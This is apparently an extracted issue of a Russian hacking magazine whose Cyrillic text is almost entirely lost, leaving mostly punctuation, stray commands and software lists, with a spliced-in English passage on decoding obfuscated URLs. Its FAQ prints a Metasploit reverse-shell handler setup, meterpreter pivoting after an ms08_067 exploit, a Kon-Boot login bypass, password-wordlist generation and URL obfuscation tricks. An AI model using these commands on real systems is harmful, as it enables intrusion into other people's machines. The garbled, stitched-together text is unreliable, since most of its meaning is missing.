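    -m multiport --dports 27519,27521 -m recent --remove
# Everything else is dropped
iptables -P INPUT DROP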

.
10 22- ,
.
. , 22- ,
,
.
iptables xtables-addons
(patch-o-matic) TARPIT. ( , ACCEPT
DENY), ,
. , TARPIT,
, ,
,
,
. TARPIT
DoS:
# iptables -A INPUT -p tcp -m tcp --dport 80 -j TARPIT

( TCP-, '-sT'):
# iptables -A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
# iptables -A INPUT -p tcp -m tcp --dport 25 -j ACCEPT
# iptables -A INPUT -p tcp -m tcp -j TARPIT

, ,
( 80 25) . , , DELUDE,
, RST-
. CHAOS,
.

, , . , pf
iptables, ,
.z


UNITS

Mifrill mifrill@real.xakep.ru

TORRENTS.RU
VS

01


rutracker.org
. ,
,
-,
. -
, ?

, ..
, .
-,
.
,

.

02

,
, ,
. , ,


?
, ,

-
.
,

, (, ,
-). -


rutracker.org , ,
.

03


, rutracker.org
.
- ,
?

. ,
,

, ,
, ..
.
, ,
.
: ,
.

04

, , ?
, . , ,
,

,

,
, ,
, .
torrents.ru ifolder-
. ,


. ,

,
.

05


, ,
?
?
. .

, , , .
,
. , ,

.
,
.
,
, ,
.

RuTracker.org torrents.ru

06

,
torrents.ru ? ,
,
, , ?
. Rutracker.org
, .
, .
, ,
.

07

: ,

.

. .
,
,
, -
.

, ,

( ).


,
.
? ,

?

magnet-,
?
?

,
, ( 2002 -3 )
. , ,

, ,
.


.
,
.
:
,
,
. , , .
, :).

, ( ). ,
.

, , _
_.avi ,

, , , .

rutracker.org ,
,
,

, ,
.
-
: -


08

,
,
- , , (,
, !) . , , :

,
.
,
-,

. ,

, .
- ,
.

. .
(magnetlink , , ,
), ,
-
.

09

,
?

, (

torrents.ru ).
-,
, ,


, .
,
:
, ,
, , ,
. ,

, .
-,
, ,
. ,
. ,

, ,
.
.
,
Dreamtorrent Corp.


UNITS

Oriyana oriyana@xpsycho.ru

PSYCHO:

,
. ,
. ,
.

,

,
. .

.
, .
.
,
()

: ,
,
(
). ,
,
.
, -, ,
. ? .
.

:
?

,
,
, , , ;


; , ,
.
, ,

.

, .
:
.
:
60- ,
.
, ?
,
:
. ,
,

.
: -...
.
,
,
, , , ,

, .
-

,
(
) .



?
: ,
,
. -
. - ,
.

. , ,
. :
, , .
, ,
. :

,
!?
, , , ,
.

Mass-media: ,

(11-16 ) ( ,
) . , ,
.
: ,
, , , , .
, ,
.
,
, ,
. , ,
: ,
.

, .
,
.
, . , ,
, ,

, . , ,
, ,
, ,
, .
, :
, ,
- , , , .
. :
, ,
, ,
. :
,
,
, , , .
.
, , .
.

.
. ,
, ,
...

- :
-

, ,
, .
, !. ,
, , 12 .
, .
,

, .

:
,
, .
,

, ,

.

. House
M.D.
.
.
, , , ,


UNITS

; , )
.

.
, ;
,
,
, , .
:
.
, ,
, .


,
. ,
.
,
.
.
, ,
.
40 ,
-
.
, . ,
( ) :
;

?; , , ,
, .
, .
-
. , ,
, . ?
!
, , .

,
.

. , ,
, , .
,
, -


, ...
.
, ,
.
. , ,
. ,
,
.
. , , ,
, .
,
.
, (.
).

!


, ,
, ,
, .
,
. . :
(, , ) ( ,

, : ,
,
;
;
, ;
,
.
,
-
? ,
.
, .
, , ,

.
5-7 , ,
. , ,
.
,
.
.
.
, ,
. ,
, , : ,

,
.
?

.
, .

:
-
,

, ,
, ,
,

.
,
, ,
, , , , ?
, ,

, ?
.
,
,
, , ,
, . , . ,
, ,
, ,
. , .
:

,
, . , ,
.

,
, . -
, -
, -
. ,
, .


(
). ,
?

.

: ( )
( , , ,

).
-.
, ,
.
, ,
,
.

. ,
-


,
.
:
, :
;

, ,
: , -


,
,
( );

, :

.
, ,
!
,
-
.
,
.
,

. , ,
.
, -.
, .

,
.
? :
.
:
,
, .
20 , , .

.
,
,
.
,
. ,
?
,


. .


,
.
, .
. , () (
,
, ), .


?
, . , . : ,
, , , , ,
, , , , , , , , , , , , ,
.

,
,

, ?

:
? , , , ,

.
.

,
, ,
.
, ,


.
(, ),
, , .
,
, .
-
, ,
,
.

.
, ,
.
, .
- ,


,

.
? , , , , ,

, ,
, , ,
,
,
.
, , ,
,
,
.
.
, ,
, , .
20 :

. , -
,
, ,
. ,
.
, ,
.
:
,
, .
, .
,
. ,


. ,
. ,
. , -
, .

!
4000

- .

,
,
.
,
,
, : ,
, .
? , , ,
, .
.
: ?
:
,
,
, ,
,
-, -

. ,
.

. .

.
, ?
1. .
,
,
? ,
? , :
( ):
,
-
?
2. . ,
.
?
?
,
?.
.

. .
, ,
.
3. , .
. .

.
4. . , IT
:).z


UNITS
ant

faq
united
@real.xakep.ru

Q: ,
LHOST,

ruby_example.rc, .

. ,
.

LPORT, PAYLOAD
Metasploit Framework,
.

A: , .
, Metasploit Framework . ,
.

Ruby.
msfconsole.rc
~/.msf3/msfconsole.rc,

msfconsole.
(exploit, PAYLOAD, LPORT, LHOST ..).
, , ,

documentation/msfconsole_rc_ruby_example.rc
$ ./msfconsole -r documentation/msfconsole_rc_

resource (documentation/msfconsole_rc_ruby_example.rc)> use exploit/multi/handler
resource (documentation/msfconsole_rc_ruby_example.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
resource (documentation/msfconsole_rc_ruby_example.rc)> set LPORT 4444
resource (documentation/msfconsole_rc_ruby_example.rc)> set LHOST 192.168.0.228
resource (documentation/msfconsole_rc_ruby_example.rc)> set ExitOnSession false
resource (documentation/msfconsole_rc_ruby_example.rc)> exploit -j

, Metasploit HD Moore

Metasploit Express

Q: Metasploit
. , Metasploit
?

A: , Metasploit .
,
10.1.1.1 10.1.1.128.
:
[*] Meterpreter session 1 opened (10.1.1.1:4444 -> 10.1.1.128:1238)
meterpreter > run get_local_subnets
Local subnet: 10.1.1.0/255.255.255.0
meterpreter > background
msf exploit(ms08_067_netapi) > route add 10.1.1.0 255.255.255.0 1
msf exploit(ms08_067_netapi) > route print
Active Routing Table
====================
Subnet      Netmask         Gateway
------      -------         -------
10.1.1.0    255.255.255.0   Session 1

, 10.1.1.0
,
Metasploit-.
auto_add_route:
msf exploit(ms08_067_netapi) > load auto_add_route
[*] Successfully loaded plugin: auto_add_route
msf exploit(ms08_067_netapi) > exploit

,

.
Q:
: ,
( / )?

A:
Nmap. ,
:

, ,
, , .
, , 70 31337.
GUI-
Nmap Zenmap.
Q:
?

A: .
, .
Kon-Boot (www.piotrbania.com/all/kon-boot). : Floppy/CD/
USB //
. 1st
Kon-Boot. ,
2nd try boot from
drive C: as hd1.
hd1 hd2 ..
Linux
kon-usr, Windows

( ).

Windows (
), Linux ( ,
).
Q: . -

OUTPUT:
-oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3,
and Grepable format, respectively, to the given filename.

-oX <_> (output XML) , XML-


.
XML-,

NDiff, Nmap. ,
,
:
$ ndiff -v scanme-1.xml scanme-2.xml
-Not shown: 95 filtered ports
+Not shown: 993 filtered ports
 PORT      STATE  SERVICE VERSION
 22/tcp    open   ssh
 25/tcp    closed smtp
 53/tcp    open   domain
+70/tcp    open   gopher
 80/tcp    open   http
 113/tcp   closed auth
+31337/tcp open   Elite

,
. ,
?

A:
, ,
. .
CeWL (Custom Word List
generator www.digininja.org).
Ruby
( 2) .
:
depth ;
min_word_length
;
write .

John The Ripper,
,
( ).

JTR Config Maker (sites.google.com/site/reusablesec2/jtrconfiggenerator).

Q: Linux
?

A: , ,
,

ls. , ls ltr .

, : find /etc -type f -printf "%T@ %T+ %p\n" | sort -n.
Q: - Linux ?

A: Windows-
, Samba,

Windows.
: net rpc shutdown -S thehostname -U theusername,
thehostname
IP-.
, shutdown Windows: net rpc shutdown -S thehostname -U theusername -f -t 60 ( 60
).
Q: - URL-?
A: URL ,
8- 16-,
32- . URL
66.102.13.19
:
http://0x42.0x66.0x0d.0x63
http://0x42660d63
http://1113984355
http://00000102.00000146.00000015.00000143

,
google.com.
. ,
, ,
, , 8-, 16- 32-
IP-. IP - www.
csgnetwork.com/ipaddconv.html.
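A URL filter or log parser has to undo these notations before it compares a host against an allow or deny list. The following normalizer is an added example, not part of the original answer: it applies the classic inet_aton() rules (0x prefix for hex, leading 0 for octal, last component fills the remaining bytes) to the four URL forms listed above. The function names and the two control URLs are assumptions made for the illustration.

```python
import ipaddress
from urllib.parse import urlsplit

_DIGITS = "0123456789abcdef"


def _parse_part(part):
    """Parse one dot-separated component: 0x = hex, leading 0 = octal, else decimal."""
    low = part.lower()
    if low.startswith("0x"):
        digits, base = low[2:], 16
    elif low.startswith("0") and len(low) > 1:
        digits, base = low[1:], 8
    else:
        digits, base = low, 10
    if not digits or any(c not in _DIGITS[:base] for c in digits):
        raise ValueError(part)
    return int(digits, base)


def decode_numeric_host(host):
    """Return the dotted-decimal address a numeric host stands for, or None for a name."""
    parts = host.rstrip(".").split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        *head, tail = [_parse_part(p) for p in parts]
    except ValueError:
        return None
    # Leading components are one byte each; the last one fills the remaining bytes.
    if any(n > 0xFF for n in head) or tail >= 1 << (8 * (4 - len(head))):
        return None
    value = tail
    for i, n in enumerate(head):
        value |= n << (8 * (3 - i))
    return str(ipaddress.IPv4Address(value))


def inspect_url(url):
    """Return (canonical_ip, obfuscated); (None, False) when the host is a name."""
    host = urlsplit(url).hostname or ""
    ip = decode_numeric_host(host)
    return ip, ip is not None and host != ip


# The four forms listed on the page, plus two constructed controls.
SAMPLES = [
    "http://0x42.0x66.0x0d.0x63",
    "http://0x42660d63",
    "http://1113984355",
    "http://00000102.00000146.00000015.00000143",
    "http://66.102.13.99/",   # constructed: already canonical
    "http://google.com/",     # constructed: ordinary host name
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(url, "->", inspect_url(url))
```

A host that decodes to an address but is not written in dotted decimal is worth flagging in proxy or mail-gateway logs, since ordinary links rarely use these notations.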
Q:
, NAT?

A: NAT,
.
NAT ,
. , .
Pwnat ,


UNITS

NAT-,
, NAT,

. - ,
, DNS UPnP/
STUN/ICE - .
: ./pwnat <-s | -c> <args>, -s, -c
.
:
<args>: [local ip] <local port> <proxy host> [proxy port (def:2222)] <remote host> <remote port>

, ,
:
<args>: [local ip] [proxy port (def:2222)] [[allowed host]:[allowed port] ...]

Q: , BSOD?

A: ,
, ,
WhoCrashed (www.resplendence.com/whocrashed). -
, .
, , -.
, , ,
, (!). ,
32-, 64- .

Rvalue-, ,
.
Q:
-,
.

C++0x.
?

A: , ,
,
C++.
(draft-),
: .
, VS2010
C++.
,
C++0x,
. ,
.
, -,
,


A: about:config
( ). "extensions.checkCompatibility"
"false". ,
.

, , ,

Q: : -

FTP,

, -

A: ,
; ,
,
(, ..).

, . (api.yandex.ru/detector/doc/dg/concepts/About.xml). .
http://phd.yandex.net/detect/ ,
XML- .
(
iPhone, Android ,
, Opera Mini).
HTTP-,
: profile, wap-profile, x-wap-profile,
user-agent, x-operamini-phone-ua.
PHP/Perl
.

SSH

Q: Gmail' - Drag'n'Drop'
. -? .

Q: Visual Studio -

A:
HTML5 FileAPI (www.w3.org/TR/2009/WD-FileAPI-20091117).
JS
.
, MIME-, , ! ,
HTML5,
: FileAPI
Firefox Chrome.
,
:
javascript.ru/blog/Brmaley.ee/FileAPI, www.kigorw.com/articles/dd-file.
Q: Firefox
, ,

, ?

A:
SFTP,
WinSCP (winscp.net).
:
, ,
.
,
(
AccountName).
Ctrl+T . , ,
, .
, .
option batch on
option confirm off
open AccountName
cd /home/step/
call tar -cz --exclude=*cache* -f /home/step/tmp/FTP-backup-$(date +%Y-%m-%d).tgz ./public_html/
cd /home/step/tmp/
get -delete FTP-backup* "c:\My Dropbox\Backup\"
exit


. open
,
(
).

Get
, ( Dropbox).
WinSCP (
, , nnCron),
WinSCP.exe /console /script="backup.txt".
, , , , backup.txt. z

>Multimedia
1by1 1.69
AV Voice Changer 7.0
BlockCAD 3.18
FastStone Image Viewer 4.2
Google Earth 5
HandBrake 0.9.4
Nitro PDF Professional 6
Paint.NET 3.5.5
Pepakura Designer 3.0.7
Picasa 3.6
PrimoPDF
Recolored 1.1
ScreenshotCaptor 2.78.0.1
SUPER 2010 build37
The KMPlayer 2.9.3.1428

>Misc
7stacks 1.5beta
Context Menu Enhancer 2.0
Cyber-D's Autodelete 2.24
Dexpot 1.5.0
FileAlyzer 1.6.0.4
FolderSize 1.0.7
Gmail Notifier Plus for Windows
7 2.2
Jumplist-Launcher 7
LiberKey Standard 4.8
Metamorphose 2 0.7.0
OffiSync Free
Regshot 1.8.2
Replace Text 2.2
StandaloneStack 2.0.7
ThinkingRock 2.2.1
WhoCrashed 2.10

>Games
OpenTTD 1.0.1
Warsow 0.5

>>WINDOWS
>Development
Beyond Compare 3.1.11
BinVis
CodeSmith 5.2.1 Professional
DbOctopus 1.1.1
DLL Export Viewer 1.36
Gobby 0.5
HeidiSQL 5.1
HelpNDoc 2.5
Hex Workshop 6.0.1
HexAssistant 2.7
Intype Alpha 0.3.1
IronRuby 1.0
JavaFX 1.3 SDK
Mercurial 1.5.1
MonoDevelop 2.2.2
MySQL Workbench 5.1.18a
Negatory Assembly Studio 1.0
PowerGUI Build 2.0.0
py2exe 0.6.9
Qt Creator 1.3.1
SharpDevelop 3.2RC2
TOra 2.1.2
TortoiseSVN 1.6.8

>>UNIX
>Desktop
Adobe Reader 9.3.2
aTunes 2.0.0

>System
Auslogics BoostSpeed 4.5.15
Auslogics Disk Defrag 3.1.4
Avast Free Antivirus 5.0.507
Comodo Firewall + Antivirus for
Windows 4.0
HijackThis 2.0.4
Macrium Reflect FREE Edition
4.2.2525
Microsoft Security Essentials
MultiMon Lite
Online Armor Free v4.0.0.44
OSSEC 2.4.1
Paragon Backup & Recovery 10.1
Free Edition
Speccy 1.01.132
Total Commander 7.55 beta 3

>Security
AxCrypt 1.7
Bruter 1.0
DarunGrim 2.5.2
DJ Java Decompiler 3.11.11.95
Fiddler2 Beta
FOCA 2.0.2
inSSIDer
Javascript Keylogger 1.4
JBroFuzz 2.1
Nessus 4.2.2
Netsparker Community Edition
OperaPasswordDecryptor
OWASP Code Crawler 2.7
PatchDiff2 2.0.6
PDFiD 0.0.11
Peach 2.3.6
PyLoris 3.0
Sandcat + Sandcat4PHP 4.0 RC1
Scapy 2.1
SFX-SQLi
SIP Workbench v1.0.0.3970
Snort 2.8.6
TrueCrypt 6.3a
VB Decompiler Lite 7.9

>Net
Desktop Google Reader 1.3
Download Master Portable
5.6.5.1201
HydraIRC 0.3
LogMeIn Hamachi
Radmin 3.4
The Dude 3.6
uTorrent 2.0.1
Torrent - a (very) tiny BitTorrent
client_files
Xmarks
Internet Explorer

VueScan 8.6.28
Xfire 1.124

>Net
Adobe Flash Player 10.0.45.2
EiskaltDC++ 2.0.1
Empathy 2.30.1
Firestarter 1.0.3
FreeDC++ 0.0.2
Google Chrome 5.0.342.9 Beta
Gufw 9.10.4
Jucy 0.83
MCabber 0.10.0
Miro 3.0.1
Mozilla Firefox 3.6.3
Mumble 1.2.2
Opera 10.10
Pidgin 2.6.6
Skype 2.0.072
Vuze 4.4
W3Perl 3.085
Websitary 0.6
WeeChat 0.3.2

>Games
Bos Wars 2.6.1

>Devel
Bouml 4.20.0
Bugzilla 3.6
Diffuse 0.4.3
GCC 4.5.0
Gtest 1.5.0
IcedTea 1.8
IronRuby 1.0
iText 5.0.2
itools 0.61.2
KDevelop 4.0 RC3
Perl 5.12
Pharo 1.0
SciPy 0.7.2
SQLAlchemy 0.6.0
SVEditor 0.1.9
Umbrello 2.2.0
Vala 0.8.1
xmlparselib 0.62
Yasm 1.0.0

Awn 0.4.0
Banshee 1.6.0
Birthday Notifier 1.1
BlackRain DarkSide Port
Buuf 2.30.2
Digikam 1.2.0
Gnome Icon Theme 2.30.1
Google Gadgets 0.11.2
gPhoto2 2.4.9
InfoPanel 0.10.1
Lxdvdrip 1.76
Mathomatic 15.0.7
Me TV 1.2.0
Osmo 0.2.10
Printoxx 2.6
Quod Libet 2.2.1
ScanTailor 0.9.8
SMPlayer 0.6.9
VLC 1.0.6

>X-Distr
Ubuntu 10.04 LTS

>System
2click Update 5.5
ATI Catalyst 10.3
BusyBox 1.16.1
Deja Dup 14.0.3
Linux Kernel 2.6.33.3
NTP 4.2.6p1
nVidia 195.36.24
q4wine 0.118
Sakura 2.3.8
Sudo 1.7.2
SysVinit 2.88
Watsup 1.8
Wine 1.1.43
Xen 4.0.0
xf86-video-intel 2.11.0

>Server
Apache 2.2.15
BIND 9.7.0
Charles 3.5.1
CUPS 1.4.3
DHCP 4.1.1
IndiMail 1.7.3
Monkeyd 0.10.1
OpenLDAP 2.4.22
OpenSSH 5.5
OpenVPN 2.1.1
phpFreeChat 1.3
Postfix 2.7.0
PostgreSQL 8.4.3
Samba 3.5.2
Smpfilter 0.4.1
SpamCheck 0.6.8
Squid 3.1.1
Tinc 1.0.13
uHub 0.3.1
Ziproxy 3.0.0

>Security
Aircrack-ng 1.1
Arno iptables firewall 1.9.2
Arping2 2.09
Avast! Home Edition 1.3.0
BleachBit 0.7.4
Cutter 1.0.3
HnTool 0.1.1
Hogger 0.2.0
JBroFuzz 2.1
m0n0wall 1.32
Nessus 4.2.2
Nmap 5.30BETA1
PulledPork 0.4.1
PyLoris 3.0
Sara 7.9.2a
Scapy 2.1.1
SIP Inspector 1.10
Snort 2.8.6
Sshguard 1.4
Xplico 0.5.6


UNITS

HTTP:// WWW2

ICQ, Skype, Gtalk


IM-

GAZOPA

www.gazopa.com

IMO

www.imo.im
,
-
meebo.com. , ,
imo.im. , , - Skype,
, .
imo.im , Skype, GTalk!
imo.im .


. TinEye
(tineye.com), , . Google Chrome.
, - ,
GazoPa. ,
, ,
Flash-.

.htaccess

.HTACCESS REDIRECT KAMELEOON


htaccessredirect.net

.htaccess , , - , .
404/500 , ,
IP,
.htaccess .
, ,
.htaccess redirect.
-.


www.kameleoon.com
. : -
. , . : ,
AJAX-.

.
Kameleoon , , Wordpress.